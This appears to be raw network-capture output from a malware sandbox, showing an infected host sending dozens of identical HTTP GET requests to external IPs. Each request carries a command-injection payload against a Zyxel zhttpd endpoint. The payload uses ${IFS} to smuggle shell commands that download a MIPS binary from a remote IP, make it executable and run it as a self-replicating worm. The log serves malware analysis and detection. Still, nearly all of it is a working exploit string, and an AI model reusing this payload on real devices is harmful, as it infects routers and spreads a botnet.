                                            Jan 14, 2024 15:50:44.509212971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5650192.168.2.234507671.134.245.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509213924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5651192.168.2.234081682.96.73.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509212971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5652192.168.2.233717448.187.167.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509234905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5653192.168.2.235276092.184.58.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509258032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5654192.168.2.235357845.97.153.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509325981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5655192.168.2.235839418.33.83.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509367943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5656192.168.2.2354172148.29.50.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509402990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5657192.168.2.2356464151.2.133.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509426117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5658192.168.2.234959076.130.237.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509466887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5659192.168.2.2343884103.165.110.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509504080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5660192.168.2.2341492153.73.81.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509532928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5661192.168.2.235484892.124.173.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509553909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5662192.168.2.2346860196.130.179.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509601116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5663192.168.2.2334208170.51.199.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509639025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5664192.168.2.2337558149.196.16.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509653091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5665192.168.2.234372446.92.9.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509696960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5666192.168.2.233703648.185.95.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509721041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5667192.168.2.2338104190.240.123.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509761095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5668192.168.2.235461862.247.233.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509768009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5669192.168.2.233825461.182.95.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509797096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5670192.168.2.2336302163.144.128.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509823084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5671192.168.2.2345754112.95.203.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509833097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5672192.168.2.2358406142.128.254.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509876966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5673192.168.2.234513853.102.120.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509903908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5674192.168.2.2353162112.248.246.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509911060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5675192.168.2.23378404.238.110.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509952068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5676192.168.2.2348030124.246.7.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509994984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5677192.168.2.235940425.139.117.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.509999037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5678192.168.2.234988869.0.225.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510062933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5679192.168.2.2350734135.71.198.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510065079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5680192.168.2.2349794149.75.168.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510076046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5681192.168.2.2358100156.188.214.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510121107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5682192.168.2.2354010163.189.53.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510178089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5683192.168.2.2347278144.65.9.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510204077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5684192.168.2.234766267.146.188.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510241985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5685192.168.2.235052096.67.196.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510263920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5686192.168.2.234696260.91.75.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510282993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5687192.168.2.235641232.128.44.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510307074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5688192.168.2.2341198121.12.71.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510366917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5689192.168.2.2344298139.49.112.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510380983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5690192.168.2.2340376218.122.225.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510416031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5691192.168.2.2342896179.32.60.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510464907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5692192.168.2.2347908144.81.204.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510492086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5693192.168.2.2348174115.204.122.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510540962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5694192.168.2.2357916219.61.254.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510554075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5695192.168.2.2359056100.166.38.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510627031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5696192.168.2.2340638209.240.126.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510632038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5697192.168.2.2346302154.156.3.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510644913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5698192.168.2.2334852195.40.214.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510652065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5699192.168.2.235044254.30.234.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510703087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5700192.168.2.2339188183.73.131.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510730982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5701192.168.2.2347242101.252.224.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510767937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5702192.168.2.2357344155.112.136.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510793924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5703192.168.2.2340984137.6.243.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510801077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5704192.168.2.2340596126.161.252.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510854006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5705192.168.2.2340994173.95.243.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510863066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5706192.168.2.2335258197.217.90.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510907888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5707192.168.2.234648243.119.158.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510971069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5708192.168.2.234118214.4.144.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.510993958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5709192.168.2.234438877.9.186.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511028051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5710192.168.2.23361421.14.245.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511086941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5711192.168.2.235287817.81.89.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.511091948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5712192.168.2.233897083.234.87.18443
                                            TimestampBytes transferredDirectionData
